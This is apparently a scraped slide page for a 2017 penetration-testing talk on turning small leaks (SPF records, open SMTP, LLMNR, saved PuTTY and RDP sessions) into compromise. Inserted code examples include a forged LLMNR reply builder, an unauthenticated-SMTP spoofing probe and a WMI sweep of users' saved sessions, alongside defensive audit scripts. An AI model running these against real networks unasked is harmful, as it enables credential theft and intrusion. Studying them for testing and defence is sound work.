Copyright © FireEye, Inc. All rights reserved.1
Brandon Arvanaghi
@arvanaghi
Breadcrumbs to Loaves: How Tidbits of Information Lead Us to Full-Scale Compromise
Brandon Arvanaghi (@arvanaghi)
• Security Consultant at Mandiant
• Webshell detection, post-exploitation, sandbox detection tools
• Researched automated attack plan generation at Vanderbilt University
Breadcrumbs
• Small, seemingly benign or irrelevant pieces of information that can lead to major exploitation
• Types of breadcrumbs:
• Open Source Intelligence Gathering (OSINT)/External
• Wireless
• Internal (physical connection)
• Post-exploitation – Bulk of Talk
• SessionGopher – tool I developed to discover Unix systems and jump boxes
https://github.com/fireeye/SessionGopher
OSINT/EXTERNAL
BREADCRUMBS
Crumb #1: SPF Records
• Sender Policy Framework
• You own example.com
• Problem: Spoofing emails from @example.com is easily done by creating a mail server and modifying headers
• Solution: an SPF record in example.com's DNS zone. It says "you should only see emails from @example.com from the following IP addresses: ..."
• Recipients now automatically check with example.com's DNS servers whether the email's source IP is in the SPF record
Crumb #1: SPF Records
• As an attacker, SPF records provide insight into third parties
• Sometimes, companies want third parties to be able to send mail on their behalf
• E.g. LinkedIn trusting DocuSign to send emails from
• https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf-records
• https://hackertarget.com/quietly-mapping-the-network-attack-surface/
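Added example, not part of the talk or of the two posts linked above: a PowerShell function that parses an SPF record into the networks and third-party includes it authorizes, so the domain owner can see exactly who is allowed to send as the domain (the same data an outside reader takes as OSINT). Get-SpfDelegations works offline on a record string; Get-DomainSpfDelegations fetches the record with the built-in Resolve-DnsName cmdlet. The sample record and the include names in it are constructed.

```powershell
# Added example: enumerate the senders an SPF record authorizes, to audit your own delegations.
function Get-SpfDelegations {
    param([Parameter(Mandatory)][string]$Record)

    if ($Record -notmatch '^v=spf1(\s|$)') { throw "Not an SPF record: $Record" }

    $includes = @(); $networks = @(); $redirect = $null; $allQualifier = $null
    foreach ($term in ($Record.Trim() -split '\s+' | Select-Object -Skip 1)) {
        switch -Regex ($term) {
            # Each mechanism may carry an optional qualifier (+ - ~ ?) in front of it
            '^[+\-~?]?include:(.+)$' { $includes += $Matches[1] }   # third party's own SPF is pulled in
            '^[+\-~?]?ip[46]:(.+)$'  { $networks += $Matches[1] }   # explicitly authorized addresses
            '^redirect=(.+)$'        { $redirect = $Matches[1] }    # whole policy delegated elsewhere
            '^([+\-~?])?all$'        { $allQualifier = if ($Matches[1]) { $Matches[1] } else { '+' } }
        }
    }
    [pscustomobject]@{
        Includes     = $includes
        Networks     = $networks
        Redirect     = $redirect
        AllQualifier = $allQualifier   # '-' hard fail, '~' soft fail, '?' neutral, '+' pass (anyone may send)
    }
}

function Get-DomainSpfDelegations {
    param([Parameter(Mandatory)][string]$Domain)
    # Long TXT records are published as several strings; join them before parsing
    $txt = Resolve-DnsName -Name $Domain -Type TXT -ErrorAction Stop |
        Where-Object { ($_.Strings -join '') -like 'v=spf1*' } |
        Select-Object -First 1
    if ($txt) { Get-SpfDelegations -Record ($txt.Strings -join '') }
}

# Constructed sample record (not any real domain's policy)
$sample = 'v=spf1 ip4:203.0.113.0/24 include:_spf.example-saas.net include:spf.protection.outlook.com ~all'
Get-SpfDelegations -Record $sample | Format-List
```

Every name under Includes is an organization whose own SPF record, and whose own security, now decides who may send as your domain; review that list the way you would review a vendor with VPN access. A record ending in `+all` or `?all` authorizes everyone and is worth fixing before anything else.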
Crumb #2: Subsidiaries
• A company is only as strong as its weakest link
• Mergers and Acquisitions
• Due diligence
• Cyber insurance
Crumb #3: Unauthenticated SMTP Server
• If port 25 (SMTP) is open on a remote host, you may be able to send unauthenticated mail from that server to internal employees
• Without authentication, you can spoof any internal email address!
http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-commands-via-gmail
INTERNAL
BREADCRUMBS
Crumb #1: LLMNR
• LLMNR = Link-Local Multicast Name Resolution
• Hosts on the same link (subnet) answer name-resolution queries for one another, instead of relying only on the DNS server
• Peer-to-peer, decentralized
• Fast
• Multicast
• Implicitly trusts every responder
• Responder by SpiderLabs
Unicast Example (diagram): the PC sends a standard DNS query to the DNS server, the server answers with 10.0.30.15, and the PC connects to 10.0.30.15 ✅
Multicast Example (diagram): the PC asks everyone on the link via LLMNR "Hi everyone! Where's confluence.corp.com?", a host answers "That's me! 10.1.40.15, come over!", and the PC connects to 10.1.40.15
Crumb #2: IT HelpDesk/Intranet
• Company helpdesk sites often lack authentication
• Real examples from engagements:
• “Our point of sale terminals can be accessed from Win7-Client1, Win7-Client2, and Win7-Client3”
• Excel file storing Unix system passwords
Crumb #2: IT HelpDesk/Intranet
1. Nmap scan across subnets
2. Run EyeWitness by Christopher Truncer
Crumb #3: Anonymous Shares
• Publicly available shared folders that do not require any form of authentication
• Often out of perceived necessity
• Contractors, vendors
• Result: plaintext password files
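Added example, not from the talk: a PowerShell check that lists the non-administrative SMB shares on a host whose share-level ACL grants access to Everyone, Guests or ANONYMOUS LOGON, which is the condition that turns a share into this breadcrumb. It uses the built-in SmbShare cmdlets (Windows 8 / Server 2012 and later) and reports share permissions only; the NTFS ACL on the folder still has to be reviewed separately.

```powershell
# Added example: find SMB shares whose share-level permissions admit anonymous or everyone.
function Get-BroadlySharedFolders {
    param([string]$ComputerName)   # optional: query a remote host through a CIM session

    $broadPrincipals = @('Everyone', 'ANONYMOUS LOGON', 'Guests', 'Guest')
    $cim = @{}
    if ($ComputerName) { $cim.CimSession = New-CimSession -ComputerName $ComputerName }

    # Skip the hidden administrative shares (C$, ADMIN$, IPC$ ...)
    foreach ($share in Get-SmbShare @cim | Where-Object { $_.Name -notmatch '\$$' }) {
        foreach ($ace in Get-SmbShareAccess -Name $share.Name @cim) {
            # AccountName looks like 'Everyone' or 'BUILTIN\Guests'; compare on the bare name
            $principal = ($ace.AccountName -split '\\')[-1]
            if ($ace.AccessControlType -eq 'Allow' -and $principal -in $broadPrincipals) {
                [pscustomobject]@{
                    Share     = $share.Name
                    Path      = $share.Path
                    Principal = $ace.AccountName
                    Right     = $ace.AccessRight   # Read, Change or Full
                }
            }
        }
    }
    if ($cim.CimSession) { Remove-CimSession $cim.CimSession }
}

# Usage: Get-BroadlySharedFolders | Format-Table
#        Get-BroadlySharedFolders -ComputerName FILE01 | Export-Csv broad-shares.csv -NoTypeInformation
```

A share that legitimately has to be open to contractors or vendors should at least be scoped to a dedicated group and scanned for the password files the slide mentions; the output above gives you the list to start from.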
Crumb #4: When Hostnames Make Sense
• Use PowerView or ADExplorer to get lists of hostnames
• Nonintrusive way to understand the role of each system without doing Nmap scans
• SQLWIN7.CORP.COM
• MAIL01.CORP.COM
• MEDIA-BKUP.CORP.COM
WIRELESS BREADCRUMBS
Crumb #1: Guest Network Host Visibility
• Guest networks should be segregated. This is not always done properly.
• Visible hosts with visible services can lead to lateral movement onto corporate network
• Pivot!
Crumb #2: Remembered Networks
• Your device probes for every access point it remembers having associated with
• Yells out known SSID names indiscriminately
• A WiFi Pineapple responds to any probe, automatically connecting you
• Directs your traffic to the internet while reading all unencrypted traffic
• Quietly changing HTTPS requests to HTTP

Remembered Networks: Real Mandiant Engagement (sequence of screenshot slides)
• associated!
• Visible to two different networks
• PsExec, WMIExec, etc.
POST-EXPLOITATION
SessionGopher: Finding Unix Systems and Jump Boxes
https://github.com/fireeye/SessionGopher
The Registry
• On many engagements, consultants are tasked with exploiting Unix systems
• Intellectual property on MacBook Pros
• Point of sale terminals running Linux
• Etc.
• Often not domain-joined!
• Would be so much easier if they were
• Use PowerView
• How can we find & exploit them?
The Registry
• Current methodology
1. Nmap for live hosts not found in Active Directory
a. Open Unix ports
2. Run netstat on domain-joined systems, look for active connections over Unix ports
3. Search Active Directory for groups like “Linux Admins” & “Mac Admins”
a. Find their members’ workstations, active sessions
• Methodology relies on luck and active sessions. Better way?
The Registry
• HKEY_USERS
• Persistent storage of saved sessions for any user who has logged in!
• Users don't have to be currently logged in
• Though Unix systems are not domain-joined, they are often managed by domain-joined Windows systems
• Valuable artifacts on these hosts
• Solves our "active session" problem
• But what can we find in this magical hive that helps us exploit Unix systems?
The Registry
Solution
1. Find artifacts left by tools typically used to access Unix systems.
2. If they exist, then saved sessions might exist. Extract ’em.
Tools
• WinSCP
• FileZilla
• PuTTY
• SuperPuTTY
• VNC
• RDP
• More!
Paths to Sessions
Stored in Registry
• PuTTY
• HKEY_USERS\<SID>\SOFTWARE\SimonTatham\PuTTY\Sessions
• WinSCP
• HKEY_USERS\<SID>\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
• Microsoft Remote Desktop
• HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers
Non-registry (assumes filename/location unchanged)
• FileZilla
• <Drive>:\Users\<Username>\AppData\Roaming\FileZilla\sitemanager.xml
• SuperPuTTY
• <Drive>:\Users\<Username>\Documents\SuperPuTTY\Sessions.xml
WinSCP
HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\Sessions\<SessionName>
HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\Configuration\Security
WinSCP
Paths to Sessions
• HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Default
FileZilla
<Drive>:\Users\<Username>\AppData\Roaming\FileZilla\SiteManager.xml
SuperPuTTY
<Drive>:\Users\<Username>\Documents\SuperPuTTY\Sessions.xml
• ExtraArgs field can contain plaintext password
PuTTY .ppk Files
• One-click PuTTY logins
• Key can be plaintext (as shown here) or encrypted
Microsoft .rdp Files
• Executable, but can be read by dragging it into a text editor
• Plethora of arguments, many optional
• Host, if admin, prompt for credentials, etc.
• Fieldname:TypeOfField:Value
• TypeOfField = Integer or String
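Added example, not from the talk: a small PowerShell parser for the Fieldname:TypeOfField:Value lines of a .rdp file, followed by a check that flags what an incident responder would want to know about a file found on a host: an embedded password blob (the "password 51:b:" field, which holds a DPAPI-protected secret), a disabled credential prompt, and a connection to the administrative session. Real files use the type letters s (string), i (integer) and b (binary/hex blob). The sample lines are constructed and the blob value is a placeholder, not real ciphertext.

```powershell
# Added example: parse .rdp settings and flag credential-hygiene findings.
function ConvertFrom-RdpFile {
    param([Parameter(Mandatory)][string[]]$Lines)
    $settings = [ordered]@{}
    foreach ($line in $Lines) {
        # name:type:value, where type is s (string), i (integer) or b (binary/hex blob)
        if ($line -notmatch '^(?<name>[^:]+):(?<type>[sib]):(?<value>.*)$') { continue }
        $name = $Matches.name; $type = $Matches.type; $raw = $Matches.value
        $value = if ($type -eq 'i') { [int]$raw } else { $raw }
        $settings[$name] = [pscustomobject]@{ Type = $type; Value = $value }
    }
    $settings
}

function Get-RdpFileFindings {
    param([Parameter(Mandatory)][string[]]$Lines, [string]$Source = '<inline>')
    $s = ConvertFrom-RdpFile -Lines $Lines
    $findings = [System.Collections.Generic.List[string]]::new()

    if ($s.Contains('password 51') -and $s['password 51'].Value) {
        $findings.Add('Stored password blob (DPAPI-protected; usable by anyone who can run code as this user)')
    }
    if ($s.Contains('prompt for credentials') -and $s['prompt for credentials'].Value -eq 0) {
        $findings.Add('Credential prompt disabled')
    }
    if ($s.Contains('administrative session') -and $s['administrative session'].Value -eq 1) {
        $findings.Add('Connects to the administrative (console) session')
    }
    [pscustomobject]@{
        Source   = $Source
        Host     = if ($s.Contains('full address')) { $s['full address'].Value } else { $null }
        Username = if ($s.Contains('username')) { $s['username'].Value } else { $null }
        Findings = $findings.ToArray()
    }
}

# Constructed sample; the blob is a placeholder, not real ciphertext
$sample = @(
    'full address:s:sqlwin7.corp.com'
    'username:s:CORP\dbadmin'
    'prompt for credentials:i:0'
    'administrative session:i:1'
    'password 51:b:0102PLACEHOLDER'
)
Get-RdpFileFindings -Lines $sample | Format-List

# Sweep a profile tree:
# Get-ChildItem C:\Users -Recurse -Filter *.rdp -ErrorAction SilentlyContinue |
#     ForEach-Object { Get-RdpFileFindings -Lines (Get-Content $_.FullName) -Source $_.FullName }
```

The parser keeps every field, so the same object can answer other review questions (gateway settings, drive redirection) without a second pass; the findings list is the part to feed into a ticket or a cleanup script.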
Windows Management Instrumentation (WMI)
• Rather than running SessionGopher on each computer (impractical), we can use WMI
• Built-in “Invoke-WmiMethod” command in PowerShell
• Remote registry querying ability
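Added example serving both the "Paths to Sessions" slides above and this WMI slide; it is not SessionGopher's code. It walks every loaded user hive under HKEY_USERS on a host through the StdRegProv WMI class (hive handle 0x80000003) and lists the saved PuTTY, WinSCP and Microsoft RDP session names found under the registry paths the slides give, then checks the default FileZilla and SuperPuTTY file locations through the C$ administrative share. An incident responder or administrator can use it to inventory where stored credentials live and who owns them. Assumptions: WMI and the admin share are reachable with the caller's rights, and profiles live on C:.

```powershell
# Added example (not SessionGopher's code): inventory saved-session artifacts on a host via WMI.
$HKEY_USERS = [uint32]2147483651   # 0x80000003, the StdRegProv handle for HKEY_USERS

# Session containers from the "Paths to Sessions" slide; each subkey is one saved session
$SessionKeys = @{
    PuTTY  = 'Software\SimonTatham\PuTTY\Sessions'
    WinSCP = 'Software\Martin Prikryl\WinSCP 2\Sessions'
    RDP    = 'Software\Microsoft\Terminal Server Client\Servers'
}

function Get-RemoteRegistrySubKeys {
    param([string]$ComputerName, [uint32]$Hive, [string]$Path)
    $wmi = @{ Namespace = 'root\default'; Class = 'StdRegProv'; Name = 'EnumKey'; ArgumentList = @($Hive, $Path) }
    if ($ComputerName) { $wmi.ComputerName = $ComputerName }
    $result = Invoke-WmiMethod @wmi
    # ReturnValue 0 = success; a missing key returns a non-zero code and no names
    if ($result.ReturnValue -eq 0 -and $result.sNames) { $result.sNames } else { @() }
}

function Get-SavedSessionInventory {
    param([string]$ComputerName = $env:COMPUTERNAME)
    # HKEY_USERS holds one hive per loaded profile; keep only regular domain/local user SIDs
    $sids = Get-RemoteRegistrySubKeys -ComputerName $ComputerName -Hive $HKEY_USERS -Path '' |
        Where-Object { $_ -match '^S-1-5-21-\d+-\d+-\d+-\d+$' }
    foreach ($sid in $sids) {
        foreach ($tool in $SessionKeys.Keys) {
            $sessions = Get-RemoteRegistrySubKeys -ComputerName $ComputerName -Hive $HKEY_USERS -Path "$sid\$($SessionKeys[$tool])"
            foreach ($name in $sessions) {
                [pscustomobject]@{ Computer = $ComputerName; UserSid = $sid; Tool = $tool; Session = $name }
            }
        }
    }
}

function Get-SavedSessionFiles {
    param([string]$ComputerName = $env:COMPUTERNAME)
    # Assumes profiles under C:\Users and a reachable C$ share (file-based paths from the slides)
    $relativePaths = 'AppData\Roaming\FileZilla\sitemanager.xml', 'Documents\SuperPuTTY\Sessions.xml'
    foreach ($profile in Get-ChildItem -Path "\\$ComputerName\C`$\Users" -Directory -ErrorAction SilentlyContinue) {
        foreach ($rel in $relativePaths) {
            $file = Join-Path $profile.FullName $rel
            if (Test-Path -LiteralPath $file) {
                [pscustomobject]@{ Computer = $ComputerName; User = $profile.Name; Tool = ($rel -split '\\')[-2]; File = $file }
            }
        }
    }
}

# Usage: aggregate across targeted computers into one CSV, as the "-o" slide describes for SessionGopher
# 'WIN7-CLIENT1','WIN7-CLIENT2' |
#     ForEach-Object { Get-SavedSessionInventory -ComputerName $_; Get-SavedSessionFiles -ComputerName $_ } |
#     Export-Csv saved-sessions.csv -NoTypeInformation
```

The inventory only names sessions; it deliberately does not read the value data underneath them. The CSV it produces is the map of which Windows workstations hold stored access to which Unix and jump hosts, which is exactly the set of machines to prioritize for credential cleanup and monitoring.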
Write to CSV (Invoke-SessionGopher -o)
• Create a physical mapping of the network
• Aggregate all session data across entire domain or targeted computers
• Essentially, see the physical infrastructure of network!
QUESTIONS?
Twitter: @arvanaghi
Github: https://github.com/fireeye/SessionGopher
Brandon Arvanaghi

Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 

Breadcrumbs to Loaves: BSides Austin '17

  • 1. Copyright © FireEye, Inc. All rights reserved. Brandon Arvanaghi (@arvanaghi). Breadcrumbs to Loaves: How Tidbits of Information Lead Us to Full-Scale Compromise
  • 2. Brandon Arvanaghi (@arvanaghi)
    • Security Consultant at Mandiant
    • Webshell detection, post-exploitation, sandbox detection tools
    • Researched automated attack plan generation at Vanderbilt University
  • 3. Breadcrumbs
    • Small, seemingly benign or irrelevant pieces of information that can lead to major exploitation
    • Types of breadcrumbs:
      • Open Source Intelligence Gathering (OSINT)/External
      • Wireless
      • Internal (physical connection)
      • Post-exploitation (bulk of talk)
    • SessionGopher: tool I developed to discover Unix systems and jump boxes. https://github.com/fireeye/SessionGopher
  • 4. OSINT/EXTERNAL BREADCRUMBS
  • 5. Crumb #1: SPF Records
    • Sender Policy Framework
    • You own example.com
    • Problem: spoofing email from @example.com is easy; anyone can stand up a mail server and set the headers
    • Solution: publish an SPF record (a TXT record) in example.com's DNS zone that says "mail from example.com should only come from the following IP addresses: ..."
    • Receiving mail servers automatically look up example.com's SPF record and check whether the connecting server's IP is listed
    • Caveat: SPF is evaluated against the envelope sender (MAIL FROM) and the HELO name, not the From: header a user sees; without DMARC alignment the displayed From: can still be spoofed
  • 6. Crumb #1: SPF Records
    • As an attacker, SPF records provide insight into third parties
    • Companies often want third parties to send mail on their behalf, and authorize them with include: mechanisms in the record
    • E.g. LinkedIn trusting DocuSign to send email on its behalf
    • https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf-records
    • https://hackertarget.com/quietly-mapping-the-network-attack-surface/
  • 7. Crumb #2: Subsidiaries
    • A company is only as strong as its weakest link
    • Mergers and acquisitions
    • Due diligence
    • Cyber insurance
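The SPF breadcrumb from slides 5 and 6 in working form, as an added example that is not part of the talk or of SessionGopher: a walker that follows include:/redirect= chains and lists the third parties a domain lets send as itself. It runs against a constructed in-memory map of TXT records (SAMPLE_TXT; every name and netblock in it is made up) so it works offline; pass a real resolver function to walk_spf() for a domain you are authorized to assess.

```python
"""Enumerate the senders an SPF record authorizes, following include: chains.

Added example, not from the talk. Instead of live DNS it walks a constructed,
in-memory map of TXT records (SAMPLE_TXT) so it runs offline; pass a real
resolver function to walk_spf() to run it against a domain you are
authorized to assess. Domain names and netblocks below are made up.
"""
from typing import Callable, Dict, List

# Constructed sample zone data. example.com is the target; the other names
# stand in for third-party mail senders it has authorized.
SAMPLE_TXT: Dict[str, List[str]] = {
    "example.com": [
        "v=spf1 ip4:203.0.113.0/24 include:_spf.mailvendor.example "
        "include:crm.example a mx -all",
        "google-site-verification=abc123",  # unrelated TXT record, must be skipped
    ],
    "_spf.mailvendor.example": [
        "v=spf1 ip4:198.51.100.0/23 include:_netblocks.mailvendor.example ~all"
    ],
    "_netblocks.mailvendor.example": ["v=spf1 ip6:2001:db8::/32 -all"],
    # points back at the target: the walker must not loop on it
    "crm.example": ["v=spf1 include:example.com -all"],
}

Resolver = Callable[[str], List[str]]


def lookup_txt(name: str) -> List[str]:
    """Offline stand-in for a TXT lookup."""
    return SAMPLE_TXT.get(name.lower(), [])


def spf_record(name: str, resolver: Resolver):
    """Return the domain's SPF TXT record (there should be exactly one), or None."""
    for txt in resolver(name):
        if txt.lower().startswith("v=spf1"):
            return txt
    return None


def walk_spf(domain: str, resolver: Resolver = lookup_txt, max_lookups: int = 10) -> dict:
    """Follow include:/redirect= chains and collect who may send as `domain`.

    Counts the DNS-querying mechanisms (include, a, mx, ptr, exists, redirect)
    the way a receiver does: RFC 7208 caps them at 10 per evaluation, and a
    record over the cap yields permerror, which receivers treat as no SPF.
    """
    result = {"includes": set(), "networks": set(), "errors": [], "lookups": 0}
    seen, queue = set(), [domain.lower()]
    while queue:
        name = queue.pop(0)
        if name in seen:
            continue
        seen.add(name)
        record = spf_record(name, resolver)
        if record is None:
            result["errors"].append(f"{name}: no SPF record")
            continue
        for term in record.split()[1:]:
            mech = term.lstrip("+-~?").lower()  # qualifier does not matter for enumeration
            if mech.startswith("include:") or mech.startswith("redirect="):
                target = mech[8:] if mech.startswith("include:") else mech[9:]
                result["lookups"] += 1
                result["includes"].add(target)
                queue.append(target)
            elif mech.startswith(("ip4:", "ip6:")):
                result["networks"].add(mech.split(":", 1)[1])
            elif mech in ("a", "mx", "ptr") or mech.startswith(("a:", "a/", "mx:", "mx/", "ptr:", "exists:")):
                result["lookups"] += 1  # resolves to the domain's own hosts
            elif mech == "all" or mech.startswith("exp="):
                pass
            else:
                result["errors"].append(f"{name}: unrecognized term {term}")
    if result["lookups"] > max_lookups:
        result["errors"].append(
            f"permerror: {result['lookups']} DNS-querying terms exceed the limit of {max_lookups}")
    return result


def third_parties(domain: str, resolver: Resolver = lookup_txt) -> List[str]:
    """The include: targets outside the target domain itself: the OSINT breadcrumb."""
    walked = walk_spf(domain, resolver)
    return sorted(t for t in walked["includes"] if not (t == domain or t.endswith("." + domain)))


if __name__ == "__main__":
    print(third_parties("example.com"))
```

Every name third_parties() returns is a vendor the target has authorized to send as it, which is exactly the social-engineering lead the slide describes; the lookups counter is the practitioner's check that the record is even valid, since a record past ten lookups fails open.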
  • 8. (image only; no slide text)
  • 9. (image only; no slide text)
  • 10. (image only; no slide text)
  • 11. Crumb #3: Unauthenticated SMTP Server
    • If port 25 (SMTP) is open on a remote host, you may be able to send unauthenticated mail from that server to internal employees
    • Without authentication, you can spoof any internal email address!
    • http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-commands-via-gmail
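The check behind slide 11, as an added example that is not from the talk: a client that walks the SMTP exchange up to RCPT TO and reports whether a spoofed internal sender is accepted without AUTH, alongside a constructed FakeOpenRelay that models the misconfigured server so both sides of the exchange can be run offline. Hostnames and addresses are made up; the client issues RSET instead of DATA so nothing is ever queued. Run it only against hosts you are authorized to test.

```python
"""Probe an SMTP server for unauthenticated envelope acceptance.

Added example, not from the talk. FakeOpenRelay is a constructed stand-in for
the misconfigured internal server the slide describes (no AUTH advertised,
any MAIL FROM / RCPT TO accepted) so the exchange can be exercised offline.
The client stops after RCPT TO and issues RSET, so no message is ever queued.
"""
import socket
import socketserver
import threading
from typing import List


def _read_reply(reader) -> List[str]:
    """Read one SMTP reply. Lines of a multi-line reply carry 'ddd-'; the last carries 'ddd '."""
    lines = []
    while True:
        line = reader.readline().decode("utf-8", "replace").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return lines


def _send(sock, reader, command: str, transcript: list) -> List[str]:
    transcript.append("C: " + command)
    sock.sendall((command + "\r\n").encode("utf-8"))
    reply = _read_reply(reader)
    transcript.extend("S: " + line for line in reply)
    return reply


def check_unauthenticated_relay(host: str, port: int, mail_from: str, rcpt_to: str,
                                timeout: float = 5.0) -> dict:
    """Return whether the server takes an envelope for rcpt_to, as mail_from, with no AUTH.

    A spoofed internal sender and an internal recipient accepted without AUTH
    is the finding on slide 11: anyone who can reach port 25 can impersonate staff.
    """
    result = {"auth_advertised": False, "mail_from_accepted": False,
              "rcpt_accepted": False, "transcript": []}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        reader = sock.makefile("rb")
        result["transcript"].extend("S: " + line for line in _read_reply(reader))  # 220 banner
        ehlo = _send(sock, reader, "EHLO probe.example", result["transcript"])
        result["auth_advertised"] = any(line[4:].upper().startswith("AUTH") for line in ehlo)
        if _send(sock, reader, f"MAIL FROM:<{mail_from}>", result["transcript"])[-1].startswith("250"):
            result["mail_from_accepted"] = True
            rcpt = _send(sock, reader, f"RCPT TO:<{rcpt_to}>", result["transcript"])
            result["rcpt_accepted"] = rcpt[-1].startswith("250")
        _send(sock, reader, "RSET", result["transcript"])  # abandon the envelope; never send DATA
        _send(sock, reader, "QUIT", result["transcript"])
    return result


class FakeOpenRelay(socketserver.StreamRequestHandler):
    """Constructed model of the vulnerable server: no AUTH, accepts every envelope."""

    def handle(self):
        self.wfile.write(b"220 mail.corp.example ESMTP\r\n")
        for raw in self.rfile:
            verb = raw.decode("utf-8", "replace").strip().split(":")[0].split(" ")[0].upper()
            if verb in ("EHLO", "HELO"):
                self.wfile.write(b"250-mail.corp.example\r\n250-PIPELINING\r\n250 8BITMIME\r\n")
            elif verb in ("MAIL", "RCPT", "RSET"):
                self.wfile.write(b"250 OK\r\n")
            elif verb == "QUIT":
                self.wfile.write(b"221 Bye\r\n")
                return
            else:
                self.wfile.write(b"500 Command not recognized\r\n")


def start_fake_relay():
    """Start FakeOpenRelay on an ephemeral loopback port; returns (server, port)."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeOpenRelay)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    server, port = start_fake_relay()
    verdict = check_unauthenticated_relay("127.0.0.1", port, "ceo@corp.example", "finance@corp.example")
    server.shutdown()
    print("\n".join(verdict["transcript"]))
    print("spoofed internal mail accepted without AUTH:",
          verdict["rcpt_accepted"] and not verdict["auth_advertised"])
```

A server that offers AUTH in its EHLO reply but still accepts RCPT TO before any AUTH command is the same finding; the transcript is kept so the evidence can go straight into the report.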
  • 12. INTERNAL BREADCRUMBS
  • 13. Crumb #1: LLMNR
    • LLMNR = Link-Local Multicast Name Resolution
    • When a name cannot be resolved through the DNS server, the host asks every machine on the same link (subnet) via multicast, instead of relying on the DNS server alone
    • Peer-to-peer, decentralized
    • Fast
    • Multicast
    • Implicitly trusts everyone: whichever host answers first is believed, with no authentication
    • Responder (SpiderLabs) answers these queries with the attacker's address and captures the NetNTLM authentication the victim then sends
  • 14. Unicast Example (diagram): the PC sends a standard DNS query to the DNS server
  • 15. Unicast Example (diagram): the DNS server answers 10.0.30.15; the PC says "Great! I'm coming to 10.0.30.15"
  • 16. Unicast Example (diagram): the PC connects to 10.0.30.15 ✅
  • 17. Multicast Example (diagram): the PC multicasts over LLMNR "Hi everyone! Where's confluence.corp.com?"; another host answers "That's me! 10.1.40.15, come over!"
  • 18. Multicast Example (diagram): the PC says "Great! I'm coming to 10.1.40.15" and connects to whoever answered
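The exchange on slides 17 and 18 on the wire, as an added example that is not from the talk and not Responder's code: LLMNR reuses the DNS message format (UDP 5355, multicast group 224.0.0.252), so a query, the reply a rogue host sends for it, and the victim's parsing of that reply can all be shown with struct. The name and addresses are the slide's constructed ones; packets are built and parsed in memory, nothing is sent.

```python
"""Build an LLMNR query and the poisoned reply a rogue host can send.

Added example, not from the talk and not Responder's code. LLMNR reuses the
DNS message format over UDP 5355 to the multicast group 224.0.0.252; a host
that gets no answer from DNS asks the link and believes the first reply.
Nothing in that reply ties it to the real confluence.corp.com. Packets are
built and parsed in memory; the name and addresses are the slide's.
"""
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355
QTYPE_A, QCLASS_IN = 1, 1
FLAG_QR = 0x8000  # set in the header of a response


def encode_name(name: str) -> bytes:
    """DNS label encoding: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split(".")) + b"\x00"


def decode_name(data: bytes, offset: int):
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def build_query(txid: int, name: str) -> bytes:
    """What the PC on slide 17 multicasts: ID, zero flags, one question, no answers."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def build_poisoned_reply(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """What the rogue host on slide 17 sends back: the question echoed plus an A record for itself.

    Everything needed to forge it (the transaction ID and the name) is in the
    multicast query that every host on the link already received.
    """
    txid = struct.unpack("!H", query[:2])[0]
    name, offset = decode_name(query, 12)
    question = query[12:offset + 4]  # name + QTYPE + QCLASS, copied verbatim
    header = struct.pack("!HHHHHH", txid, FLAG_QR, 1, 1, 0, 0)
    rdata = bytes(int(octet) for octet in attacker_ip.split("."))
    answer = encode_name(name) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_reply(packet: bytes) -> dict:
    """What the victim's resolver does with whatever arrives first: take the A record at face value."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", packet[:12])
    offset = 12
    for _ in range(qdcount):
        _, offset = decode_name(packet, offset)
        offset += 4
    answers = []
    for _ in range(ancount):
        name, offset = decode_name(packet, offset)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", packet[offset:offset + 10])
        offset += 10
        rdata, offset = packet[offset:offset + rdlen], offset + rdlen
        if rtype == QTYPE_A and rclass == QCLASS_IN and rdlen == 4:
            answers.append({"name": name, "address": ".".join(str(b) for b in rdata), "ttl": ttl})
    return {"id": txid, "is_response": bool(flags & FLAG_QR), "answers": answers}


if __name__ == "__main__":
    query = build_query(0x1234, "confluence.corp.com")
    print(parse_reply(build_poisoned_reply(query, "10.1.40.15")))
```

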